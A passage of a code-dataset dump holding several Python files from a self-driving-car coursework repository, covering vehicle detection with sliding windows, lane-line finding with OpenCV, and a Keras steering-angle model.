\"__main__\":\n\n\tsaveFeatures(ori=orient, pix=pix_per_cell, cell=cell_per_block, cspace=cspace)\n\t# X_train, X_test, y_train, y_test = loadData()\n\t# trainModel(X_train, X_test, y_train, y_test)\n\tX, y = loadDataFull()\n\tclf, scaler = trainModelFull(X, y)\n\tframes = []\n\tfor i, img_name in enumerate(test_images):\n\t\timg = plt.imread(img_name)\n\t\theat = np.zeros_like(img[:,:,0]).astype(np.float)\n\n\t\twindows = slide_window(img, x_start_stop=[650, img.shape[1]+20],\n\t\t\ty_start_stop=[380, 650], xy_overlap=(0.65, 0.65))\n\t\twindows2 = slide_window(img, x_start_stop=[650, img.shape[1]+40],\n\t\t\ty_start_stop=[380, 650], xy_overlap=(0.75, 0.75), xy_window=(80, 80))\n\t\twindows3 = slide_window(img, x_start_stop=[650, img.shape[1]+40],\n\t\t\ty_start_stop=[380, 650], xy_overlap=(0.75, 0.75), xy_window=(96, 96))\n\n\t\tt = time.time()\n\t\ton_windows = search_windows(img, windows, clf, scaler,\n\t\t\t\t\t\torient=orient, pix_per_cell=pix_per_cell,\n\t\t\t\t\t\tcell_per_block=cell_per_block, cspace=cspace)\n\t\tt2 = time.time()\n\t\t# print(round(t2-t, 2), 'Seconds to perform search_windows')\n\n\t\tt = time.time()\n\t\ton_windows2 = search_windows(img, windows2, clf, scaler,\n\t\t\t\t\t\torient=orient, pix_per_cell=pix_per_cell,\n\t\t\t\t\t\tcell_per_block=cell_per_block, cspace=cspace)\n\t\tt2 = time.time()\n\t\t# print(round(t2-t, 2), 'Seconds to perform search_windows')\n\n\t\tt = time.time()\n\t\ton_windows3 = search_windows(img, windows3, clf, scaler,\n\t\t\t\t\t\torient=orient, pix_per_cell=pix_per_cell,\n\t\t\t\t\t\tcell_per_block=cell_per_block, cspace=cspace)\n\t\tt2 = time.time()\n\t\t# # print(round(t2-t, 2), 'Seconds to perform search_windows')\n\n\t\tfinal = draw_boxes(img, windows)\n\t\tplt.imshow(final)\n\t\tplt.savefig(\"output_images/{}windows\".format(i))\n\n\t\tfinal = draw_boxes(img, windows2)\n\t\tplt.imshow(final)\n\t\tplt.savefig(\"output_images/{}windows2\".format(i))\n\n\t\tfinal = draw_boxes(img, windows3)\n\t\tplt.imshow(final)\n\t\tplt.savefig(\"output_images/{}windows3\".format(i))\n\n\t\tfinal = draw_boxes(img, on_windows)\n\t\tplt.imshow(final)\n\t\tplt.savefig(\"output_images/{}search_windows\".format(i))\n\n\t\tfinal = draw_boxes(img, on_windows2)\n\t\tplt.imshow(final)\n\t\tplt.savefig(\"output_images/{}search_windows2\".format(i))\n\n\t\tfinal = draw_boxes(img, on_windows3)\n\t\tplt.imshow(final)\n\t\tplt.savefig(\"output_images/{}search_windows3\".format(i))\n\n\t\tsave_on_windows(img, on_windows, 1, i)\n\t\tsave_on_windows(img, on_windows2, 2, i)\n\t\tsave_on_windows(img, on_windows3, 3, i)\n \n\t\theatmap = add_heat(heat, on_windows)\n\t\theatmap = add_heat(heatmap, on_windows2)\n\t\theatmap = add_heat(heatmap, on_windows3)\n\t\theatmap = apply_threshold(heatmap, 2)\n\t\tplt.imshow(heatmap, cmap='hot')\n\t\tplt.savefig(\"output_images/{}heatmap\".format(i))\n\t\tlabels = label(heatmap)\n\t\tdraw_img = draw_labeled_bboxes(np.copy(img), labels)\n\t\tplt.imshow(draw_img)\n\t\tplt.savefig(\"output_images/{}box\".format(i))\n\tprint(\"img{} labels =\".format(i) + str(labels[1]))\n" }, { "alpha_fraction": 0.6052997708320618, "alphanum_fraction": 0.6356613039970398, "avg_line_length": 43.484535217285156, "blob_id": "47c701d7ad64d0aac3d822f760cc7c5535608629", "content_id": "017b631e5b7bc3c3443cfbf32c811b8bc13fa3f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12944, "license_type": "no_license", "max_line_length": 125, "num_lines": 291, "path": "/CarND-Advanced-Lane-Lines/helper.py", "repo_name": "KyleGrier/self-driving", "src_encoding": "UTF-8", "text": "import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport glob\n\ndef calibrate(img, objpoints, imgpoints):\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, gray.shape[::-1], None, None)\n undist = cv2.undistort(img, mtx, dist, None, mtx)\n return undist\n\ndef warp(img):\n img_size = (img.shape[1], img.shape[0])\n #Coordinates outlining the lane\n tl_src = [562, 471]\n tr_src = [720, 471]\n br_src = [1088, 720]\n bl_src = [206, 720]\n \n # determine the height and width of the transformed image\n widthA = np.sqrt(((br_src[0] - bl_src[0]) ** 2) + ((br_src[1] - bl_src[1]) ** 2))\n widthB = np.sqrt(((tr_src[0] - tl_src[0]) ** 2) + ((tr_src[1] - tl_src[1]) ** 2))\n maxWidth = max(int(widthA), int(widthB))\n \n heightA = np.sqrt(((tr_src[0] - br_src[0]) ** 2) + ((tr_src[1] - br_src[1]) ** 2))\n heightB = np.sqrt(((tl_src[0] - bl_src[0]) ** 2) + ((tl_src[1] - bl_src[1]) ** 2))\n maxHeight = max(int(heightA), int(heightB))\n \n #Coordinates of the transformed image\n '''\n tl_dst = [0, 0]\n tr_dst = [maxWidth - 1, 0]\n br_dst = [maxWidth - 1, maxHeight - 1]\n bl_dst = [0, maxHeight - 1]\n \n tl_dst = [0, 0]\n tr_dst = [img.shape[1], 0]\n br_dst = [img.shape[1]-1, img.shape[0]-1]\n bl_dst = [0, img.shape[0]-1]\n '''\n tl_dst = [200,270]\n tr_dst = [900,270]\n br_dst = [900,720]\n bl_dst = [200,720]\n src = np.float32(\n [tl_src,\n tr_src,\n br_src,\n bl_src])\n \n dst = np.float32([tl_dst,\n tr_dst, \n br_dst, \n bl_dst])\n \n # Compute the perspective transform\n M = cv2.getPerspectiveTransform(src, dst)\n \n # Compute the inverse perspective transform\n Minv = cv2.getPerspectiveTransform(dst, src)\n \n warped = cv2.warpPerspective(img, M, img_size, flags=cv2.INTER_LINEAR)\n \n #cv2.polylines(img,np.int32([src]),True,(255,0,0), 5)\n #cv2.polylines(img,np.int32([dst]),True,(0,0,255), 5)\n #f, ax = plt.subplots(1, 1, figsize=(20,10))\n #ax.imshow(img)\n return warped, Minv\n\n\ndef getSobelBinaryX(gray, sobel_kernel = -1, thresh_min = 0, thresh_max=255):\n sobelx = cv2.Sobel(gray, cv2.CV_64F, 1, 0, ksize = sobel_kernel)\n abs_sobelx = np.absolute(sobelx) \n scaled_sobelx = np.uint8(255*abs_sobelx/np.max(abs_sobelx))\n scaled_sobelx = cv2.equalizeHist(scaled_sobelx)\n sxbinary = np.zeros_like(scaled_sobelx)\n sxbinary[(scaled_sobelx >= thresh_min) & (scaled_sobelx <= thresh_max)] = 1\n return sxbinary\n\ndef getSobelBinaryY(gray, sobel_kernel = -1, thresh_min = 0, thresh_max=255):\n sobely = cv2.Sobel(gray, cv2.CV_64F, 0, 1, ksize = sobel_kernel)\n abs_sobely = np.absolute(sobely)\n scaled_sobely = np.uint8(255*abs_sobely/np.max(abs_sobely))\n scaled_sobely = cv2.equalizeHist(scaled_sobely)\n sybinary = np.zeros_like(scaled_sobely)\n sybinary[(scaled_sobely >= thresh_min) & (scaled_sobely <= thresh_max)] = 1\n return sybinary\n\ndef getLaplace(gray, thresh_min = 0, thresh_max=255):\n laplace = cv2.Laplacian(gray, cv2.CV_64F)\n abs_laplace = np.absolute(laplace)\n scaled_laplace = np.uint8(255*abs_laplace/np.max(abs_laplace))\n scaled_laplace = cv2.equalizeHist(scaled_laplace)\n lapbinary = np.zeros_like(scaled_laplace)\n lapbinary[(scaled_laplace >= thresh_min) & (scaled_laplace <= thresh_max)] = 1\n return lapbinary\n\ndef getSobelX(gray, sobel_kernel=3):\n sobelx = cv2.Sobel(gray, cv2.CV_64F, 1, 0, ksize = sobel_kernel) \n abs_sobelx = np.absolute(sobelx) \n return abs_sobelx\n \ndef getSobelY(gray, sobel_kernel=3):\n sobely = cv2.Sobel(gray, cv2.CV_64F, 0, 1, ksize = sobel_kernel)\n abs_sobely = np.absolute(sobely)\n return abs_sobely\n \ndef getSobelDirection(gray, sobel_kernel = 3, thresh_min = 0, thresh_max=np.pi/2):\n sobelx = getSobelX(gray, sobel_kernel=sobel_kernel)\n sobely = getSobelY(gray, sobel_kernel=sobel_kernel)\n direction = np.arctan2(sobely, sobelx)\n dirbinary = np.zeros_like(direction)\n dirbinary[(direction >= thresh_min) & (direction <= thresh_max)] = 1\n return dirbinary\n \ndef getSatBinary(s_channel, thresh_min = 150, thresh_max=255):\n s_binary = np.zeros_like(s_channel)\n s_binary[(s_channel >= thresh_min) & (s_channel <= thresh_max)] = 1\n return s_binary\n\ndef combineBinary(combined, *binary):\n for b in binary:\n combined[(combined == 1) | (b == 1)] = 1\n return combined\n\ndef getThres(gray, thresh_min = 0, thresh_max=255):\n binary = np.zeros_like(gray)\n binary[(gray >= thresh_min) & (gray <= thresh_max)] = 1\n return binary\n\ndef windSlide(binary_warped):\n # Assuming you have created a warped binary image called \"binary_warped\"\n # Take a histogram of the bottom half of the image\n histogram = np.sum(binary_warped[int(binary_warped.shape[0]/2):,:], axis=0)\n # Create an output image to draw on and visualize the result\n out_img = np.dstack((binary_warped, binary_warped, binary_warped))*255\n # Find the peak of the left and right halves of the histogram\n # These will be the starting point for the left and right lines\n midpoint = np.int(histogram.shape[0]/2)\n leftx_base = np.argmax(histogram[:midpoint])\n rightx_base = np.argmax(histogram[midpoint:]) + midpoint\n # Choose the number of sliding windows\n nwindows = 9\n # Set height of windows\n window_height = np.int(binary_warped.shape[0]/nwindows)\n # Identify the x and y positions of all nonzero pixels in the image\n nonzero = binary_warped.nonzero()\n nonzeroy = np.array(nonzero[0])\n nonzerox = np.array(nonzero[1])\n # Current positions to be updated for each window\n leftx_current = leftx_base\n rightx_current = rightx_base\n # Set the width of the windows +/- margin\n margin = 90\n # Set minimum number of pixels found to recenter window\n minpix = 50\n # Create empty lists to receive left and right lane pixel indices\n left_lane_inds = []\n right_lane_inds = []\n # Step through the windows one by one\n for window in range(nwindows):\n # Identify window boundaries in x and y (and right and left)\n win_y_top = binary_warped.shape[0] - (window+1)*window_height\n win_y_bot = binary_warped.shape[0] - window*window_height\n win_xleft_bot = leftx_current - margin\n win_xleft_top = leftx_current + margin\n win_xright_bot = rightx_current - margin\n win_xright_top = rightx_current + margin\n # Draw the windows on the visualization image\n cv2.rectangle(out_img,(win_xleft_bot,win_y_bot),(win_xleft_top,win_y_top),\n (0,255,0), 2) \n cv2.rectangle(out_img,(win_xright_bot,win_y_bot),(win_xright_top,win_y_top),\n (0,255,0), 2) \n # Identify the nonzero pixels in x and y within the window\n good_left_inds = ((nonzeroy >= win_y_top) & (nonzeroy < win_y_bot) & \n (nonzerox >= win_xleft_bot) & (nonzerox < win_xleft_top)).nonzero()[0]\n good_right_inds = ((nonzeroy >= win_y_top) & (nonzeroy < win_y_bot) & \n (nonzerox >= win_xright_bot) & (nonzerox < win_xright_top)).nonzero()[0]\n # Append these indices to the lists\n left_lane_inds.append(good_left_inds)\n right_lane_inds.append(good_right_inds)\n # If you found > minpix pixels, recenter next window on their mean position\n if len(good_left_inds) > minpix:\n leftx_current = np.int(np.mean(nonzerox[good_left_inds]))\n if len(good_right_inds) > minpix: \n rightx_current = np.int(np.mean(nonzerox[good_right_inds]))\n \n # Concatenate the arrays of indices\n left_lane_inds = np.concatenate(left_lane_inds)\n right_lane_inds = np.concatenate(right_lane_inds)\n\n # Extract left and right line pixel positions\n leftx = nonzerox[left_lane_inds]\n lefty = nonzeroy[left_lane_inds] \n rightx = nonzerox[right_lane_inds]\n righty = nonzeroy[right_lane_inds] \n\n # Fit a second order polynomial to each\n left_fit = np.polyfit(lefty, leftx, 2)\n right_fit = np.polyfit(righty, rightx, 2)\n # Generate x and y values for plotting\n ploty = np.linspace(0, binary_warped.shape[0]-1, binary_warped.shape[0] )\n left_fitx = left_fit[0]*ploty**2 + left_fit[1]*ploty + left_fit[2]\n right_fitx = right_fit[0]*ploty**2 + right_fit[1]*ploty + right_fit[2]\n\n out_img[nonzeroy[left_lane_inds], nonzerox[left_lane_inds]] = [255, 0, 0]\n out_img[nonzeroy[right_lane_inds], nonzerox[right_lane_inds]] = [0, 0, 255]\n \n #fig, ax = plt.subplots()\n #ax.imshow(out_img)\n #ax.plot(left_fitx, ploty, color='yellow')\n #ax.plot(right_fitx, ploty, color='yellow')\n #return left_fitx, right_fitx, ploty\n return left_fit, right_fit\n \ndef usePrevSlide(binary_warped, left_fit, right_fit,lanes):\n # Assume you now have a new warped binary image \n # from the next frame of video (also called \"binary_warped\")\n # It's now much easier to find line pixels!\n nonzero = binary_warped.nonzero()\n nonzeroy = np.array(nonzero[0])\n nonzerox = np.array(nonzero[1])\n margin = 100\n left_lane_inds = ((nonzerox > (left_fit[0]*(nonzeroy**2) + left_fit[1]*nonzeroy + \n left_fit[2] - margin)) & (nonzerox < (left_fit[0]*(nonzeroy**2) + \n left_fit[1]*nonzeroy + left_fit[2] + margin))) \n\n right_lane_inds = ((nonzerox > (right_fit[0]*(nonzeroy**2) + right_fit[1]*nonzeroy + \n right_fit[2] - margin)) & (nonzerox < (right_fit[0]*(nonzeroy**2) + \n right_fit[1]*nonzeroy + right_fit[2] + margin))) \n\n # Again, extract left and right line pixel positions\n leftx = nonzerox[left_lane_inds]\n lefty = nonzeroy[left_lane_inds] \n rightx = nonzerox[right_lane_inds]\n righty = nonzeroy[right_lane_inds]\n\n # Fit a second order polynomial to each\n left_fit = np.polyfit(lefty, leftx, 2)\n right_fit = np.polyfit(righty, rightx, 2)\n # Generate x and y values for plotting\n ploty = np.linspace(0, binary_warped.shape[0]-1, binary_warped.shape[0] )\n left_fitx = left_fit[0]*ploty**2 + left_fit[1]*ploty + left_fit[2]\n right_fitx = right_fit[0]*ploty**2 + right_fit[1]*ploty + right_fit[2]\n # Create an image to draw on and an image to show the selection window\n out_img = np.dstack((binary_warped, binary_warped, binary_warped))*255\n window_img = np.zeros_like(out_img)\n lane_img = np.zeros_like(out_img)\n # Color in left and right line pixels\n lane_img[nonzeroy[left_lane_inds], nonzerox[left_lane_inds]] = [255, 0, 0]\n lane_img[nonzeroy[right_lane_inds], nonzerox[right_lane_inds]] = [0, 0, 255]\n\n # Generate a polygon to illustrate the search window area\n # And recast the x and y points into usable format for cv2.fillPoly()\n left_line_window1 = np.array([np.transpose(np.vstack([left_fitx-margin, ploty]))])\n left_line_window2 = np.array([np.flipud(np.transpose(np.vstack([left_fitx+margin, \n ploty])))])\n left_line_pts = np.hstack((left_line_window1, left_line_window2))\n right_line_window1 = np.array([np.transpose(np.vstack([right_fitx-margin, ploty]))])\n right_line_window2 = np.array([np.flipud(np.transpose(np.vstack([right_fitx+margin, \n ploty])))])\n left_line_window1 = np.array([np.transpose(np.vstack([left_fitx, ploty]))])\n right_line_window2 = np.array([np.flipud(np.transpose(np.vstack([right_fitx, \n ploty])))])\n right_line_pts = np.hstack((right_line_window1, right_line_window2))\n all_line_pts = np.hstack((left_line_window1, right_line_window2))\n cv2.fillPoly(window_img, np.int_([all_line_pts]), (0,255, 0))\n result = cv2.addWeighted(lane_img, 1, window_img, 1, 0)\n \n \n y_eval = np.max(ploty)\n left_curverad = ((1 + (2*left_fit[0]*y_eval + left_fit[1])**2)**1.5) / np.absolute(2*left_fit[0])\n right_curverad = ((1 + (2*right_fit[0]*y_eval + right_fit[1])**2)**1.5) / np.absolute(2*right_fit[0])\n ym_per_pix = 30/720 # meters per pixel in y dimension\n xm_per_pix = 3.7/700 # meters per pixel in x dimension\n \n # Fit new polynomials to x,y in world space\n left_fit_cr = np.polyfit(ploty*ym_per_pix, left_fitx*xm_per_pix, 2)\n right_fit_cr = np.polyfit(ploty*ym_per_pix, right_fitx*xm_per_pix, 2)\n # Calculate the new radii of curvature\n left_curverad = ((1 + (2*left_fit_cr[0]*y_eval*ym_per_pix + left_fit_cr[1])**2)**1.5) / np.absolute(2*left_fit_cr[0])\n right_curverad = ((1 + (2*right_fit_cr[0]*y_eval*ym_per_pix + right_fit_cr[1])**2)**1.5) / np.absolute(2*right_fit_cr[0])\n # Now our radius of curvature is in meters\n lanes.left_curverad = left_curverad\n lanes.right_curverad = right_curverad\n #fig, ax = plt.subplots()\n #ax.imshow(out_img)\n #ax.plot(left_fitx, ploty, color='yellow')\n #ax.plot(right_fitx, ploty, color='yellow')\n return result , left_fit, right_fit" }, { "alpha_fraction": 0.6155717968940735, "alphanum_fraction": 0.645255446434021, "avg_line_length": 38.53845977783203, "blob_id": "2024ebd66c32bd5712314105d4e6db95399beca5", "content_id": "074b837ab3dce14d0063b323a001250d032a7ad4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2055, "license_type": "no_license", "max_line_length": 113, "num_lines": 52, "path": "/CarND-Advanced-Lane-Lines/pipeline.py", "repo_name": "KyleGrier/self-driving", "src_encoding": "UTF-8", "text": "import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport glob\nfrom helper import warp, getSobelBinaryX, getSobelBinaryY, getSobelX, \\\n getSobelY, getSobelDirection, getSatBinary, combineBinary, windSlide, usePrevSlide, calibrate\n\n\n\nfont = cv2.FONT_HERSHEY_SIMPLEX\ntopLeftCornerOfText = (10,100)\nfontScale = 1\nfontColor = (255,255,255)\nlineType = 2\ndef pipeline(img, objpoints, imgpoints,lanes):\n #Preprocess to create warped img\n img = calibrate(img, objpoints, imgpoints)\n img_size = (img.shape[1], img.shape[0])\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n hls = cv2.cvtColor(img, cv2.COLOR_RGB2HLS)\n s_channel = hls[:,:,2]\n combined = s_channel* 0.6 + gray * 0.4\n combined = np.array( combined).astype ('uint8')\n blurf = np.zeros((1, 5))\n blurf.fill (1)\n combined = cv2.filter2D(combined, cv2.CV_32F, blurf)\n f = np.zeros((1, 30))\n f.fill (1)\n l = cv2.morphologyEx(combined, cv2.MORPH_OPEN, f)\n combined = combined - l\n combined = getSobelBinaryX(combined, sobel_kernel = 15, thresh_min = 190, thresh_max=255)\n binary_warped, minv = warp(combined)\n # Do window search or optimized window search using previous lanes\n \n # Unwarp the shaded lanes and apply to the calibrated image\n \n # Update the lane classes\n # Draw the lane onto the warped blank image\n if lanes.detected == False:\n lanes.left_fit, lanes.right_fit = windSlide(binary_warped)\n lanes.detected = True\n result, lanes.left_fit, lanes.right_fit = usePrevSlide(binary_warped, lanes.left_fit, lanes.right_fit, lanes)\n warpy = cv2.warpPerspective(result, minv, img_size, flags=cv2.INTER_LINEAR)\n final = cv2.addWeighted(img, 1, warpy, 1, 0)\n #cv2.putText(final,'Hello World!{}'.format(lanes.left_curverad),\n # topLeftCornerOfText, \n # font, \n # fontScale,\n # fontColor,\n # lineType)\n return final" }, { "alpha_fraction": 0.5281625390052795, "alphanum_fraction": 0.5533702969551086, "avg_line_length": 34.04854202270508, "blob_id": "286bdbe289797ae28072aff19804edc5788c0e25", "content_id": "83511257ccce465046cd9a713daef5204658e824", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10830, "license_type": "no_license", "max_line_length": 167, "num_lines": 309, "path": "/CarND-Behavioral-Cloning-P3/modeling.py", "repo_name": "KyleGrier/self-driving", "src_encoding": "UTF-8", "text": "import csv\nimport cv2\nimport numpy as np\nfrom keras.models import Sequential\nfrom keras.layers import Flatten, Dense, Lambda, Cropping2D, Convolution2D\nfrom keras.optimizers import Adam\nfrom random import shuffle\nfrom sklearn.model_selection import train_test_split\nimport sklearn\nimport sys\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nimport seaborn as sns\nimport os\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\npath = \"../Data/driving_log.csv\"\n\ndef getSamples():\n samples = []\n with open('data/driving_log.csv') as csvfile:\n reader = csv.reader(csvfile)\n for line in reader:\n samples.append(line)\n with open('data/new_img/driving_log.csv') as csvfile:\n reader = csv.reader(csvfile)\n for line in reader:\n samples.append(line)\n with open('data/adjust/driving_log.csv') as csvfile:\n reader = csv.reader(csvfile)\n for line in reader:\n samples.append(line)\n with open('data/data/driving_log.csv') as csvfile:\n reader = csv.reader(csvfile)\n for line in reader:\n samples.append(line)\n print(len(samples))\n shuffle(samples)\n train_samples, validation_samples = train_test_split(samples, test_size=0.2)\n return train_samples, validation_samples\n\n#Keras model derived from the Nvidia report \ndef nvidiaModel():\n model = Sequential()\n\n model.add(Lambda(lambda x: x/127.5 - 1, input_shape=(160, 320, 3)))\n #Remove top 50 pixels and the bottom 25 pixels. Don't drop sides.\n model.add(Cropping2D(cropping=((50, 25), (0,0))))\n model.add(Convolution2D(24, 5, strides=(2, 2), activation='relu'))\n model.add(Convolution2D(36, 5, strides=(2, 2), activation='relu'))\n model.add(Convolution2D(48, 5, strides=(2, 2), activation='relu'))\n model.add(Convolution2D(64, 3, activation='relu'))\n model.add(Convolution2D(64, 3, activation='relu'))\n\n model.add(Flatten())\n\n model.add(Dense(100))\n model.add(Dense(50))\n model.add(Dense(10))\n model.add(Dense(1))\n opt = Adam(lr=0.0001)\n model.compile(loss='mse', optimizer=opt)\n\n return model\n\ndef generator(samples, batch_size=32):\n num_samples = len(samples)\n while 1: # Loop forever so the generator never terminates\n shuffle(samples)\n for offset in range(0, num_samples, batch_size):\n batch_samples = samples[offset:offset+batch_size]\n images = []\n angles = []\n for batch_sample in batch_samples:\n #angle = float(batch_sample[3])\n #if abs(angle) < 0.05:\n # use_zero = np.random.randint(5)\n # if use_zero == 1:\n # img, angle = imageProcessing(batch_sample) \n # images.append(img)\n # angles.append(angle)\n #else:\n img, angle = imageProcessing(batch_sample) \n images.append(img)\n angles.append(angle)\n X_train = np.array(images)\n y_train = np.array(angles)\n yield sklearn.utils.shuffle(X_train, y_train)\n\n\ndef imageProcessing(sample, cutoff= 0.33):\n angle = float(sample[3])\n\n #To remove zero angle bias\n # if(abs(angle) < 0.05):\n # cutoff = 0.1\n mid_cutoff = (1-cutoff)/2 + cutoff\n\n #Test in order to incorporate udacity data which has a different path setup\n sp = None\n u_or_m = len(sample[0].split(\"\\\\\"))\n if (u_or_m > 1):\n sp = \"\\\\\"\n else:\n sp = '/'\n\n # Randomly pick between left, right, and center image with weighting to handle\n # zero angle bias.\n pick_camera = np.random.uniform()\n img_path = None\n\n #Use the center image\n if pick_camera <= cutoff:\n img_path = './data/IMG/' + sample[0].split(sp)[-1]\n # Use the left image\n elif pick_camera > cutoff and pick_camera <= mid_cutoff:\n img_path = './data/IMG/' + sample[1].split(sp)[-1]\n angle += 0.1\n # Use the right image\n else:\n img_path = './data/IMG/' + sample[2].split(sp)[-1]\n angle += -0.1\n\n img = cv2.imread(img_path)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n pick_flip = np.random.randint(2)\n if pick_flip == 1:\n img = cv2.flip(img, 1)\n angle *= -1\n\n pick_bright = np.random.randint(2)\n if pick_bright == 1:\n img = augmentBrightness(img)\n return img, angle\n\ndef augmentBrightness(img):\n img_hsv = cv2.cvtColor(img,cv2.COLOR_RGB2HSV)\n img_hsv = np.array(img_hsv, dtype = np.float64)\n rand_bright = 2 * np.random.uniform()\n img_hsv[:,:,2] = img_hsv[:, :, 2] * rand_bright\n img_hsv[:,:,2][img_hsv[:,:,2]>255] = 255\n img_hsv = np.array(img_hsv, dtype = np.uint8)\n img_aug = cv2.cvtColor(img_hsv,cv2.COLOR_HSV2RGB)\n return img\n\n\n#############################################################\n#############################################################\n#############################################################\n#############################################################\n\n\n\nif __name__ == \"__main__\":\n train_samples, valid_samples = getSamples()\n train_generator = generator(train_samples, batch_size=128)\n valid_generator = generator(valid_samples, batch_size=128)\n train_steps = (len(train_samples) // 128) + 1 \n valid_steps = (len(valid_samples) // 128) + 1 \n model = nvidiaModel()\n history_object = model.fit_generator(train_generator, steps_per_epoch=train_steps, \n validation_data=valid_generator, validation_steps = valid_steps, epochs=3,\n verbose = 1)\n model.save('model2.h5')\n plt.plot(history_object.history['loss'])\n plt.plot(history_object.history['val_loss'])\n plt.title('model mean squared error loss')\n plt.ylabel('mean squared error loss')\n plt.xlabel('epoch')\n plt.legend(['training set', 'validation set'], loc='upper right')\n plt.savefig('loss.png')\n\n\n\n\n\n\n#######################################################################################################################################################################\n#############################################################\n#############################################################\n############## HELPER FUNCTIONS #######################\n#############################################################\n#######################################################################################################################################################################\n\n# Small generator to test generator mechanics\ndef smallGenerator(samples, batch_size=32):\n samples = samples[0:72]\n num_samples = len(samples)\n while 1: # Loop forever so the generator never terminates\n shuffle(samples)\n for offset in range(0, num_samples, batch_size):\n batch_samples = samples[offset:offset+batch_size]\n images = []\n angles = []\n for batch_sample in batch_samples:\n name = './data/IMG/' + batch_sample[0].split(\"\\\\\")[-1]\n center_image = cv2.imread(name)\n center_angle = float(batch_sample[3])\n images.append(center_image)\n angles.append(center_angle)\n # trim image to only see section with road\n X_train = np.array(images)\n y_train = np.array(angles)\n yield sklearn.utils.shuffle(X_train, y_train)\n\n#A test of 3 images to determine if a model can learn a simple sample size.\ndef testModel(model):\n ex_neg = \"data/IMG/center_2017_11_18_16_00_07_045.jpg\"\n ex_neg_lab = -0.3743682\n ex_zero = \"data/IMG/center_2017_11_18_16_00_13_544.jpg\"\n ex_zero_lab = 0\n ex_pos = \"data/IMG/center_2017_11_18_16_00_14_701.jpg\"\n ex_pos_lab = 0.3366786\n ex = [ex_neg, ex_zero, ex_pos]\n X = np.array([plt.imread(img) for img in ex])\n y = np.array([ex_neg_lab, ex_zero_lab, ex_pos_lab])\n model.fit(X, y, epoch=100)\n score = model.evaluate(X, y)\n print(score)\n\n# Test straightness of samples\ndef straightness():\n samples = []\n with open('data/driving_log.csv') as csvfile:\n reader = csv.reader(csvfile)\n for line in reader:\n samples.append(line)\n straight = 0\n turn = 0\n for sample in samples:\n if float(sample[3]) == 0.0:\n straight += 1\n else:\n turn += 1\n print(\"Samples include {} straight images and {} turn images\".format(staight, turn))\n\n#Show the different augmented images\ndef plotSamples(gen):\n fig, ax1 = plt.subplots(figsize=(15,15))\n gs_all = gridspec.GridSpec(9, 5)\n gs_all.update(wspace=0.3, hspace=0.3)\n i = 0\n x_train, y_train = next(gen)\n samples = zip(x_train, y_train)\n for img, ang in samples:\n gs = gridspec.GridSpecFromSubplotSpec(1, 1, subplot_spec=gs_all[i])\n ax = plt.subplot(gs[0])\n ax.get_xaxis().set_ticks([])\n ax.get_yaxis().set_visible(False)\n ax.imshow(img)\n ax.set_xlabel(str(ang))\n i += 1\n plt.show()\n\ndef stats(gen):\n # iterate through samples in generator and record angles\n angles = list()\n for _, y_train in gen:\n angles.append(y_train)\n f, ax = plt.subplot(figsize=(10,12))\n sns.distplot(x)\n\ndef removeFiles(folder, the_df):\n files = os.listdir(path + folder)\n print(len(files))\n to_remove = []\n for file in files:\n search = \".*\" + file\n idx_df = df[df[\"center\"].str.contains(search)]\n to_remove.append(idx_df.index.values[0])\n indexes_to_keep = set(range(the_df.shape[0])) - set(to_remove)\n df_sliced = the_df.take(list(indexes_to_keep))\n print(df_sliced.shape[0])\n print(the_df.shape[0])\n return df_sliced\n\ndef getBridgecsv(folder):\n files = os.listdir(path + folder)\n print(len(files))\n to_get = None\n for file in files:\n search = \".*\" + file\n idx_df = df[df[\"center\"].str.contains(search)]\n if to_get is None:\n to_get = idx_df\n else:\n to_get = pd.concat([to_get, idx_df])\n \n to_get.to_csv(path_or_buf =\"data/bridge.csv\", index=False, header=False)\n return\n\ndef angleStats(samples, batch_size=32):\n num_samples = len(samples)\n shuffle(samples)\n angles = []\n for offset in range(0, num_samples, batch_size):\n batch_samples = samples[offset:offset+batch_size]\n for batch_sample in batch_samples:\n angle = float(batch_sample[3])\n if abs(angle) < 0.02:\n use_zero = np.random.randint(10)\n if use_zero == 1:\n img, angle = imageProcessing(batch_sample) \n angles.append(angle)\n else:\n img, angle = imageProcessing(batch_sample) \n angles.append(angle)\n sns.distplot(angles)\n" }, { "alpha_fraction": 0.546025276184082, "alphanum_fraction": 0.5650991797447205, "avg_line_length": 38.69682693481445, "blob_id": "e4bcc11ffb3d0ac066ab0be5d7f3be86c05a6843", "content_id": "d99218b544c50c85b0e1e2d1f29ddf0bcedc1ee6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 25008, "license_type": "no_license", "max_line_length": 136, "num_lines": 630, "path": "/CarND-Vehicle-Detect/helper.py", "repo_name": "KyleGrier/self-driving", "src_encoding": "UTF-8", "text": "import numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom skimage.feature import hog\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\nimport glob\nimport time\nfrom collections import deque\n\n\ndef getData(): \n # Read in cars and notcars\n # images = glob.glob('prac_img\\\\smallset/*/*/*.jpeg')\n images = glob.glob('dataset/**/*.png', recursive=True)\n cars = []\n notcars = []\n for image in images:\n if \"non-vehicles\" in image:\n notcars.append(image)\n else:\n cars.append(image)\n return cars, notcars\n\n# Define a function that takes an image, a list of bounding boxes, \n# and optional color tuple and line thickness as inputs\n# then draws boxes in that color on the output\ndef draw_boxes(img, bboxes, color=(0, 0, 255), thick=6):\n # make a copy of the image\n draw_img = np.copy(img)\n # draw each bounding box on your image copy using cv2.rectangle()\n for p1, p2 in bboxes:\n cv2.rectangle(draw_img, p1, p2, color, thick)\n # return the image copy with boxes drawn\n return draw_img\n\n# Define a function that takes an image, a list of bounding boxes, \n# and optional color tuple and line thickness as 